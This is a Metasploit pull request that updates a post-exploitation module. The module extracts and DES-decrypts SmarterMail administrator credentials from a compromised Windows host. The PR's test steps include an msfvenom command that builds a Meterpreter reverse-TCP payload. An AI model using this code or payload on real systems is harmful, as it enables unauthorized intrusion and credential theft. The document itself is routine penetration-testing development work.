### PR TITLE
Update smartermail to use the new cred API

### DIFF
--- a/modules/post/windows/gather/credentials/smartermail.rb
+++ b/modules/post/windows/gather/credentials/smartermail.rb
@@ -144,12 +144,12 @@ class Metasploit3 < Msf::Post
 
     if password
       begin
-        result['password'] = decrypt_des(Rex::Text.decode_base64(password))
-        result['password_type'] = :password
+        result[:password] = decrypt_des(Rex::Text.decode_base64(password))
+        result[:private_type] = :password
       rescue OpenSSL::Cipher::CipherError
-        result['password'] = password
-        result['password_type'] = :nonreplayable_hash
-        result['jtr_format'] = 'des'
+        result[:password] = password
+        result[:private_type] = :nonreplayable_hash
+        result[:jtr_format] = 'des'
       end
     end
 
@@ -170,12 +170,12 @@ class Metasploit3 < Msf::Post
       session_id: session_db_id,
       origin_type: :session,
       private_data: opts[:password],
-      private_type: opts[:password_type],
+      private_type: opts[:private_type],
       username: opts[:user]
     }
 
-    if opts['password_type'] == :nonreplayable_hash
-      credential_data.merge!(jtr_format: opts['jtr_format'])
+    if opts[:private_type] == :nonreplayable_hash
+      credential_data.merge!(jtr_format: opts[:jtr_format])
     end
 
     credential_data.merge!(service_data)
@@ -201,15 +201,17 @@ class Metasploit3 < Msf::Post
 
     # retrieve username and decrypted password from config file
     result = get_smartermail_creds(config_path)
-    if result['password'].nil?
+    if result[:password].nil?
       print_error "#{peer} - Could not decrypt password string"
       return
     end
 
     # report result
     port = get_web_server_port || 9998 # Default is 9998
-    user = result['username']
-    pass = result['password']
+    user = result[:username]
+    pass = result[:password]
+    type = result[:private_type]
+    format = result[:jtr_format]
     print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"
 
     report_cred(
@@ -218,7 +220,8 @@ class Metasploit3 < Msf::Post
       service_name: 'http',
       user: user,
       password: pass,
-
+      private_type: type,
+      jtr_format: format
     )
   end
 end

--- a/modules/post/windows/gather/credentials/smartermail.rb
+++ b/modules/post/windows/gather/credentials/smartermail.rb
@@ -174,7 +174,7 @@ class Metasploit3 < Msf::Post
       username: opts[:user]
     }
 
-    if opts[:password_type] == :nonreplayable_hash
+    if opts['password_type'] == :nonreplayable_hash
       credential_data.merge!(jtr_format: opts['jtr_format'])
     end
 

--- a/modules/post/windows/gather/credentials/smartermail.rb
+++ b/modules/post/windows/gather/credentials/smartermail.rb
@@ -66,15 +66,47 @@ class Metasploit3 < Msf::Post
     decipher.update(encrypted) + decipher.final
   end
 
+
+  def get_bound_port(data)
+    port = nil
+
+    begin
+      port = JSON.parse(data)['BoundPort']
+    rescue JSON::ParserError => e
+      elog("#{e.class} - Unable to parse BoundPort (#{e.message}) #{e.backtrace * "\n"}")
+      return nil
+    end
+
+    port
+  end
+
+
+  def get_remote_drive
+    @drive ||= expand_path('%SystemDrive%').strip
+  end
+
+
+  def get_web_server_port
+    ['Program Files (x86)', 'Program Files'].each do |program_dir|
+      path = %Q|#{get_remote_drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Web Server\\Settings.json|.strip
+      if file?(path)
+        data = read_file(path)
+        return get_bound_port(data)
+      end
+    end
+
+    return nil
+  end
+
+
   #
   # Find SmarterMail 'mailConfig.xml' config file
   #
   def get_mail_config_path
     found_path = ''
-    drive = expand_path('%SystemDrive%').strip
 
     ['Program Files (x86)', 'Program Files'].each do |program_dir|
-      path = %Q|#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip
+      path = %Q|#{get_remote_drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip
       vprint_status "#{peer} - Checking for SmarterMail config file: #{path}"
       if file?(path)
         found_path = path
@@ -106,10 +138,45 @@ class Metasploit3 < Msf::Post
     end
 
     username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/)
-    password = data.match(/<sysAdminPassword>(.+)<\/sysAdminPassword>/)
+    password = data.scan(/<(sysAdminPassword|sysAdminPasswordHash)>(.+)<\/(sysAdminPassword|sysAdminPasswordHash)>/).flatten[1]
+
     result['username'] = username[1] unless username.nil?
-    result['password'] = decrypt_des(Rex::Text.decode_base64(password[1])) unless password.nil?
+
+    if password
+      begin
+        result['password'] = decrypt_des(Rex::Text.decode_base64(password))
+      rescue OpenSSL::Cipher::CipherError
+        result['password'] = password
+      end
+    end
+
     result
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   #
@@ -131,15 +198,18 @@ class Metasploit3 < Msf::Post
     end
 
     # report result
+    port = get_web_server_port || 9998 # Default is 9998
     user = result['username']
     pass = result['password']
     print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"
-    report_auth_info(
-      :host  => r_host,
-      :sname => 'http',
-      :user  => user,
-      :pass  => pass,
-      :source_id   => session.db_record ? session.db_record.id : nil,
-      :source_type => 'vuln')
+
+    report_cred(
+      ip: r_host,
+      port: port,
+      service_name: 'http',
+      user: user,
+      password: pass,
+
+    )
   end
 end


### PR DESCRIPTION
This patch updates the smartermail post module to use the new credential API.
- [x] Set up a Windows 7 box
- [x] Download [SmarterMail](http://download01.smartertools.com/downloads/SmarterMail13_Setup.msi), install it.
- [x] Configure the admin username and password
- [x] Create a payload exe: `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=4444 -f exe -o /tmp/payload.exe`
- [x] Start msfconsole
- [x] Do: `workspace -a smartermail`
- [x] Do: `use exploit/multi/handler`
- [x] Do: `run`
- [x] Drag and drop the payload exe and get a session
- [x] At the meterpreter prompt, do: `run post/windows/gather/credentials/smartermail`
- [x] The module should say found username and password
- [x] At the meterpreter prompt, do: `background`
- [x] Do: `creds`. You should see something like this:

```
msf exploit(handler) > creds
Credentials
===========

host           service          public  private                                                                 realm  private_type
----           -------          ------  -------                                                                 -----  ------------
192.168.1.168  9997/tcp (http)  admin   1000:7e6jnidtKbZCpauEU/ILRCPfqX6ToZH+:zloQu6evaI5IACHnVweqobjVm1BNYpi8         Password
```
